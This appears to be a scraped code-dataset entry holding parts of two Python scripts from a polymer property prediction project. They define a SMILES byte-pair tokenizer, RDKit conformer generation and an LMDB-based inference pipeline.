vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
def __init__(
self,
vocab_file,
merges_file,
errors="replace",
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
add_prefix_space=False,
**kwargs
):
bos_token = AddedToken(bos_token, lstrip=False, rstrip=False) if isinstance(bos_token, str) else bos_token
eos_token = AddedToken(eos_token, lstrip=False, rstrip=False) if isinstance(eos_token, str) else eos_token
sep_token = AddedToken(sep_token, lstrip=False, rstrip=False) if isinstance(sep_token, str) else sep_token
cls_token = AddedToken(cls_token, lstrip=False, rstrip=False) if isinstance(cls_token, str) else cls_token
unk_token = AddedToken(unk_token, lstrip=False, rstrip=False) if isinstance(unk_token, str) else unk_token
pad_token = AddedToken(pad_token, lstrip=False, rstrip=False) if isinstance(pad_token, str) else pad_token
# Mask token behave like a normal word, i.e. include the space before it
mask_token = AddedToken(mask_token, lstrip=True, rstrip=False) if isinstance(mask_token, str) else mask_token
super().__init__(
errors=errors,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
cls_token=cls_token,
pad_token=pad_token,
mask_token=mask_token,
add_prefix_space=add_prefix_space,
**kwargs,
)
with open(vocab_file, encoding="utf-8") as vocab_handle:
self.encoder = json.load(vocab_handle)
self.decoder = {v: k for k, v in self.encoder.items()}
self.errors = errors # how to handle errors in decoding
self.byte_encoder = bytes_to_unicode()
self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
bpe_merges = merges_handle.read().split("\n")[1:-1]
bpe_merges = [tuple(merge.split()) for merge in bpe_merges]
self.bpe_ranks = dict(zip(bpe_merges, range(len(bpe_merges))))
self.cache = {}
self.add_prefix_space = add_prefix_space
# Should have added re.IGNORECASE so BPE merges can happen for capitalized versions of contractions
"""Regex for SMILES"""
smi_regex_pattern = r"(\-?[0-9]+\.?[0-9]*|\[|\]|SELF|Li|Be|Na|Mg|Al|K|Ca|Co|Zn|Ga|Ge|As|Se|Sn|Te|N|O|P|H|I|b|c|n|o|s|p|Br?|Cl?|Fe?|Ni?|Si?|\||\(|\)|\^|=|#|-|\+|\\|\/|@|\*|\.|\%|\$)"
self.pat = re.compile(smi_regex_pattern)
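        # Illustrative example (added): unlike GPT-2's word-level pattern, this regex splits a
        # (P)SMILES string into chemically meaningful tokens, e.g.
        #   re.findall(self.pat, "[*]CC(=O)O[*]")
        #   -> ['[', '*', ']', 'C', 'C', '(', '=', 'O', ')', 'O', '[', '*', ']']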
@property
def vocab_size(self):
return len(self.encoder)
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token)
pairs = get_pairs(word)
if not pairs:
return token
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
self.cache[token] = word
return word
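    # Note (added for clarity): bpe() above greedily applies the highest-ranked merge from
    # merges.txt until no learned merge is left, and memoises the result in self.cache, so
    # repeatedly tokenizing the same SMILES fragment is cheap.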
def _tokenize(self, text):
"""Tokenize a string."""
bpe_tokens = []
for token in re.findall(self.pat, text):
token = "".join(
self.byte_encoder[b] for b in token.encode("utf-8")
) # Maps all our bytes to unicode strings, avoiding control tokens of the BPE (spaces in our case)
bpe_tokens.extend(bpe_token for bpe_token in self.bpe(token).split(" "))
return bpe_tokens
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index)
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
text = "".join(tokens)
text = bytearray([self.byte_decoder[c] for c in text]).decode("utf-8", errors=self.errors)
return text
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
merge_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
writer.write("#version: 0.2\n")
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return vocab_file, merge_file
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A RoBERTa sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s></s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not
make use of token type ids, therefore a list of zeros is returned.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
def prepare_for_tokenization(self, text, is_split_into_words=False, **kwargs):
add_prefix_space = kwargs.pop("add_prefix_space", self.add_prefix_space)
if (is_split_into_words or add_prefix_space) and (len(text) > 0 and not text[0].isspace()):
text = " " + text
return (text, kwargs)
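# Usage sketch (illustrative; mirrors the encoding call in the __main__ block below):
#
# tokenizer = PolymerSmilesTokenizer.from_pretrained("./MMPolymer/models/roberta-base", max_len=411)
# enc = tokenizer("[*]CC(=O)O[*]", add_special_tokens=True, max_length=411,
#                 padding="max_length", truncation=True, return_tensors="pt")
# enc["input_ids"].shape  # torch.Size([1, 411])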
def smi2scaffold(smi):
try:
return MurckoScaffold.MurckoScaffoldSmiles(
smiles=smi, includeChirality=True)
except:
print("failed to generate scaffold with smiles: {}".format(smi))
return smi
def smi2_2Dcoords(smi):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
AllChem.Compute2DCoords(mol)
coordinates = mol.GetConformer().GetPositions().astype(np.float32)
    assert len(mol.GetAtoms()) == len(coordinates), "2D coordinates shape is not aligned with {}".format(smi)
return coordinates
def smi2_3Dcoords(smi,cnt):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
coordinate_list=[]
for seed in range(cnt):
try:
            res = AllChem.EmbedMolecule(mol, randomSeed=seed)  # randomSeed=-1 would generate a random conformer; a fixed seed keeps each conformer reproducible
if res == 0:
try:
                    AllChem.MMFFOptimizeMolecule(mol)  # some conformers cannot be optimized with MMFF
coordinates = mol.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
elif res == -1:
mol_tmp = Chem.MolFromSmiles(smi)
AllChem.EmbedMolecule(mol_tmp, maxAttempts=5000, randomSeed=seed)
mol_tmp = AllChem.AddHs(mol_tmp, addCoords=True)
try:
                    AllChem.MMFFOptimizeMolecule(mol_tmp)  # some conformers cannot be optimized with MMFF
coordinates = mol_tmp.GetConformer().GetPositions()
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
except:
print("Failed to generate 3D, replace with 2D")
coordinates = smi2_2Dcoords(smi)
        assert len(mol.GetAtoms()) == len(coordinates), "3D coordinates shape is not aligned with {}".format(smi)
coordinate_list.append(coordinates.astype(np.float32))
return coordinate_list
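# Note (added for clarity): smi2_3Dcoords returns `cnt` conformers (each falling back to 2D
# coordinates if embedding or MMFF optimization fails); inner_smi2coords below appends one
# extra 2D conformer, giving 10 + 1 = 11 coordinate sets per polymer, which matches the
# `--conf-size 11` flag passed to MMPolymer/infer.py in the __main__ block.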
def inner_smi2coords(content):
smi = content
target = -999
mol = Chem.MolFromSmiles(smi)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
assert 'H' not in atoms
star_atoms_id = []
for idx, atom_symbol in enumerate(atoms):
if atom_symbol == '*':
star_atoms_id.append(idx)
assert len(star_atoms_id) == 2, "Error star num"
star_pair_list = []
for star_id in star_atoms_id:
star_pair_list.append(star_id)
star_atom = mol.GetAtomWithIdx(star_id)
neighbors = star_atom.GetNeighbors()
assert len(neighbors) == 1, "Error star neighbors num"
for neighbor in neighbors:
star_pair_list.append(neighbor.GetIdx())
pair_1_star = star_pair_list[0]
pair_1 = star_pair_list[3]
atom = mol.GetAtomWithIdx(pair_1_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_1).GetAtomicNum())
pair_2_star = star_pair_list[2]
pair_2 = star_pair_list[1]
atom = mol.GetAtomWithIdx(pair_2_star)
atom.SetAtomicNum(mol.GetAtomWithIdx(pair_2).GetAtomicNum())
smi = Chem.MolToSmiles(mol)
cnt = 10
scaffold = smi2scaffold(smi)
if len(mol.GetAtoms()) > 400:
coordinate_list = [smi2_2Dcoords(smi)] * (cnt+1)
print("atom num > 400, use 2D coords",smi)
else:
coordinate_list = smi2_3Dcoords(smi, cnt)
coordinate_list.append(smi2_2Dcoords(smi).astype(np.float32))
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
atoms = [atom.GetSymbol() for atom in mol.GetAtoms()]
origin_smi = content
origin_mol = Chem.MolFromSmiles(origin_smi)
origin_atoms = [atom.GetSymbol() for atom in origin_mol.GetAtoms()]
assert origin_atoms[pair_1_star] == '*'
assert origin_atoms[pair_2_star] == '*'
atoms[pair_1_star] = '*'
atoms[pair_2_star] = '*'
return {'atoms': atoms,
'coordinates': coordinate_list,
'mol':mol, 'smi': content, 'origin_smi': content, 'star_pair': star_pair_list, 'scaffold': scaffold, 'target': target}
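# Worked example (illustrative): for the PSMILES "[*]CC[*]" the two '*' atoms mark the
# polymerization points. Each '*' is temporarily assigned the element of the atom bonded to
# the *other* star (carbon in this example), capping the repeat unit so RDKit can generate
# 2D/3D coordinates; the '*' labels are then restored in the returned `atoms` list at the
# indices recorded in `star_pair`.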
def smi2coords(content):
try:
return inner_smi2coords(content)
except:
print("failed psmiles: {}".format(content))
return None
if __name__ == "__main__":
os.environ['MKL_THREADING_LAYER'] = 'GNU'
parser = argparse.ArgumentParser()
parser.add_argument("--input_data", help="PSMILES or CSV file")
parser.add_argument("--property", help="which property to predict", default='all')
parser.add_argument('--outputs_path', default='outputs')
parser.add_argument('--cache_path', default='cache')
args = parser.parse_args()
if os.path.exists(args.outputs_path):
shutil.rmtree(args.outputs_path)
os.mkdir(args.outputs_path)
if os.path.exists(args.cache_path):
shutil.rmtree(args.cache_path)
os.mkdir(args.cache_path)
# data pre
content_list = []
if args.input_data.endswith('.csv'):
with open(args.input_data, newline='', encoding='utf-8') as csvfile:
csvreader = csv.reader(csvfile)
headers = next(csvreader)
for row in csvreader:
psmi = row[0]
content_list.append(psmi)
else:
psmi = args.input_data
content_list.append(psmi)
outputfilename = os.path.join(args.cache_path, 'test.lmdb')
env = lmdb.open(
outputfilename,
subdir=False,
readonly=False,
lock=False,
readahead=False,
meminit=False,
max_readers=1,
map_size=int(1000e9),
)
txn = env.begin(write=True)
index = 0
tokenizer = PolymerSmilesTokenizer.from_pretrained("./MMPolymer/models/roberta-base", max_len=411)
for content in tqdm(content_list):
data_info = smi2coords(content)
        if data_info is None:
continue
encoding = tokenizer(
str(data_info['origin_smi']),
add_special_tokens=True,
max_length=411,
return_token_type_ids=False,
padding="max_length",
truncation=True,
return_attention_mask=True,
return_tensors='pt',
)
data_info["input_ids"] = encoding["input_ids"].flatten()
data_info["attention_mask"] = encoding["attention_mask"].flatten()
assert data_info["input_ids"].shape[0] == 411
assert data_info["attention_mask"].shape[0] == 411
txn.put(f'{index}'.encode("ascii"), pickle.dumps(data_info, protocol=-1))
index += 1
txn.commit()
env.close()
# model run
if args.property != 'all':
property_list = [args.property]
else:
property_list = ['Egc', 'Egb', 'Eea', 'Ei', 'Xc', 'EPS', 'Nc', 'Eat']
total_psmi_list = []
total_pred_list = []
for property_name in property_list:
        weight_path = f'./ckpt/{property_name}/checkpoint_best.pt'
cmd1 = f"python ./MMPolymer/infer.py --user-dir ./MMPolymer ./ --task-name {args.cache_path} --valid-subset test --results-path {args.cache_path} --num-workers 1 --ddp-backend=c10d --batch-size 128 --task MMPolymer_finetune --loss MMPolymer_finetune --arch MMPolymer_base --classification-head-name {args.cache_path} --num-classes 1 --dict-name dict.txt --conf-size 11 --only-polar 0 --path {weight_path} --fp16 --fp16-init-scale 4 --fp16-scale-window 256 --log-interval 50 --log-format simple"
process1 = subprocess.Popen(cmd1, shell=True)
process1.wait()
predict_result_path = f'./cache/{property_name}_test_cpu.out.pkl'
predict_outputs = pd.read_pickle(predict_result_path)
pred_list = []
psmi_list = []
for epoch in range(len(predict_outputs)):
predict_output = predict_outputs[epoch]
pred_list.append(predict_output['predict'])
psmi_list.extend(predict_output['smi_name'])
pred_list = torch.cat(pred_list, dim=0).float()
psmi_list = psmi_list[::11]
pred_list = pred_list.view(-1, 11).numpy().mean(axis=1)
pred_list = np.round(pred_list, 2)
total_psmi_list.append(psmi_list)
total_pred_list.append(pred_list)
transposed_total_pred_list = list(map(list, zip(*total_pred_list)))
results_data = transposed_total_pred_list
result_pd = pd.DataFrame(results_data, columns=property_list)
result_pd.insert(0, 'psmile', total_psmi_list[0])
predict_result_save_path = os.path.join(args.outputs_path, "predict_result.csv")
print(f'The final prediction result is saved in {predict_result_save_path}')
result_pd.to_csv(predict_result_save_path, index=None)
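    # Example invocations (illustrative; `polymers.csv` is a placeholder CSV whose first
    # column holds PSMILES strings):
    #   python get_prediction_results.py --input_data "[*]CC(=O)O[*]" --property Egc
    #   python get_prediction_results.py --input_data polymers.csv
    # With the default --property all, predict_result.csv contains one column per property
    # in ['Egc', 'Egb', 'Eea', 'Ei', 'Xc', 'EPS', 'Nc', 'Eat'] plus the input psmile column.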
| 27,140 | Python | .py | 559 | 38.808587 | 504 | 0.622945 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,128 | finetune_data_process.py | FanmengWang_MMPolymer/dataset/finetune_data_process.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import csv
import shutil
import pickle
import lmdb
import subprocess
import torch
import argparse
import pandas as pd
import numpy as np
from rdkit import Chem
from tqdm import tqdm
from rdkit import RDLogger
from rdkit.Chem import AllChem
from rdkit.Chem.Scaffolds import MurckoScaffold
import warnings
warnings.filterwarnings(action='ignore')
from multiprocessing import Pool
import json
import os
from functools import lru_cache
from typing import List, Optional, Tuple
import regex as re
from transformers import AddedToken, PreTrainedTokenizer
import logging
from transformers import RobertaTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/vocab.json",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/vocab.json",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/vocab.json",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/vocab.json",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/vocab.json",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/vocab.json",
},
"merges_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/merges.txt",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/merges.txt",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/merges.txt",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/merges.txt",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/merges.txt",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"roberta-base": 512,
"roberta-large": 512,
"roberta-large-mnli": 512,
"distilroberta-base": 512,
"roberta-base-openai-detector": 512,
"roberta-large-openai-detector": 512,
}
@lru_cache()
def bytes_to_unicode():
"""
    Returns a list of utf-8 bytes and a mapping to unicode strings. We specifically avoid mapping to whitespace/control
characters the bpe code barfs on.
The reversible bpe codes work on unicode strings. This means you need a large # of unicode characters in your vocab
if you want to avoid UNKs. When you're at something like a 10B token dataset you end up needing around 5K for
decent coverage. This is a significant percentage of your normal, say, 32K bpe vocab. To avoid that, we want lookup
tables between utf-8 bytes and unicode strings.
"""
bs = (
list(range(ord("!"), ord("~") + 1)) + list(range(ord("¡"), ord("¬") + 1)) + list(range(ord("®"), ord("ÿ") + 1))
)
cs = bs[:]
n = 0
for b in range(2**8):
if b not in bs:
bs.append(b)
cs.append(2**8 + n)
n += 1
cs = [chr(n) for n in cs]
return dict(zip(bs, cs))
def get_pairs(word):
"""
Return set of symbol pairs in a word.
Word is represented as tuple of symbols (symbols being variable-length strings).
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
class PolymerSmilesTokenizer(PreTrainedTokenizer):
"""Adapt Roberta Tokenizer to PolymerSmilesTokenzier"""
"""
Original Comments:
Constructs a RoBERTa tokenizer, derived from the GPT-2 tokenizer, using byte-level Byte-Pair-Encoding.
This tokenizer has been trained to treat spaces like parts of the tokens (a bit like sentencepiece) so a word will
be encoded differently whether it is at the beginning of the sentence (without space) or not:
```
#>>> from transformers import RobertaTokenizer
#>>> tokenizer = RobertaTokenizer.from_pretrained("roberta-base")
#>>> tokenizer("Hello world")['input_ids']
[0, 31414, 232, 328, 2]
#>>> tokenizer(" Hello world")['input_ids']
[0, 20920, 232, 2]
```
You can get around that behavior by passing `add_prefix_space=True` when instantiating this tokenizer or when you
call it on some text, but since the model was not pretrained this way, it might yield a decrease in performance.
<Tip>
When used with `is_split_into_words=True`, this tokenizer will add a space before each word (even the first one).
</Tip>
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
            The beginning of sequence token that was used during pretraining. Can be used as a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
            Whether or not to add an initial space to the input. This allows treating the leading word just as any
            other word. (The RoBERTa tokenizer detects the beginning of words by the preceding space.)
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
def __init__(
self,
vocab_file,
merges_file,
errors="replace",
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
add_prefix_space=False,
**kwargs
):
bos_token = AddedToken(bos_token, lstrip=False, rstrip=False) if isinstance(bos_token, str) else bos_token
eos_token = AddedToken(eos_token, lstrip=False, rstrip=False) if isinstance(eos_token, str) else eos_token
sep_token = AddedToken(sep_token, lstrip=False, rstrip=False) if isinstance(sep_token, str) else sep_token
cls_token = AddedToken(cls_token, lstrip=False, rstrip=False) if isinstance(cls_token, str) else cls_token
unk_token = AddedToken(unk_token, lstrip=False, rstrip=False) if isinstance(unk_token, str) else unk_token
pad_token = AddedToken(pad_token, lstrip=False, rstrip=False) if isinstance(pad_token, str) else pad_token
# Mask token behave like a normal word, i.e. include the space before it
mask_token = AddedToken(mask_token, lstrip=True, rstrip=False) if isinstance(mask_token, str) else mask_token
super().__init__(
errors=errors,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
cls_token=cls_token,
pad_token=pad_token,
mask_token=mask_token,
add_prefix_space=add_prefix_space,
**kwargs,
)
with open(vocab_file, encoding="utf-8") as vocab_handle:
self.encoder = json.load(vocab_handle)
self.decoder = {v: k for k, v in self.encoder.items()}
self.errors = errors # how to handle errors in decoding
self.byte_encoder = bytes_to_unicode()
self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
bpe_merges = merges_handle.read().split("\n")[1:-1]
bpe_merges = [tuple(merge.split()) for merge in bpe_merges]
self.bpe_ranks = dict(zip(bpe_merges, range(len(bpe_merges))))
self.cache = {}
self.add_prefix_space = add_prefix_space
# Should have added re.IGNORECASE so BPE merges can happen for capitalized versions of contractions
"""Regex for SMILES"""
smi_regex_pattern = r"(\-?[0-9]+\.?[0-9]*|\[|\]|SELF|Li|Be|Na|Mg|Al|K|Ca|Co|Zn|Ga|Ge|As|Se|Sn|Te|N|O|P|H|I|b|c|n|o|s|p|Br?|Cl?|Fe?|Ni?|Si?|\||\(|\)|\^|=|#|-|\+|\\|\/|@|\*|\.|\%|\$)"
self.pat = re.compile(smi_regex_pattern)
@property
def vocab_size(self):
return len(self.encoder)
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token)
pairs = get_pairs(word)
if not pairs:
return token
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
self.cache[token] = word
return word
def _tokenize(self, text):
"""Tokenize a string."""
bpe_tokens = []
for token in re.findall(self.pat, text):
token = "".join(
self.byte_encoder[b] for b in token.encode("utf-8")
) # Maps all our bytes to unicode strings, avoiding control tokens of the BPE (spaces in our case)
bpe_tokens.extend(bpe_token for bpe_token in self.bpe(token).split(" "))
return bpe_tokens
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index)
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
text = "".join(tokens)
text = bytearray([self.byte_decoder[c] for c in text]).decode("utf-8", errors=self.errors)
return text
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
merge_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
writer.write("#version: 0.2\n")
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return vocab_file, merge_file
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A RoBERTa sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s></s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not
make use of token type ids, therefore a list of zeros is returned.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
def prepare_for_tokenization(self, text, is_split_into_words=False, **kwargs):
add_prefix_space = kwargs.pop("add_prefix_space", self.add_prefix_space)
if (is_split_into_words or add_prefix_space) and (len(text) > 0 and not text[0].isspace()):
text = " " + text
return (text, kwargs)
def smi2scaffold(smi):
try:
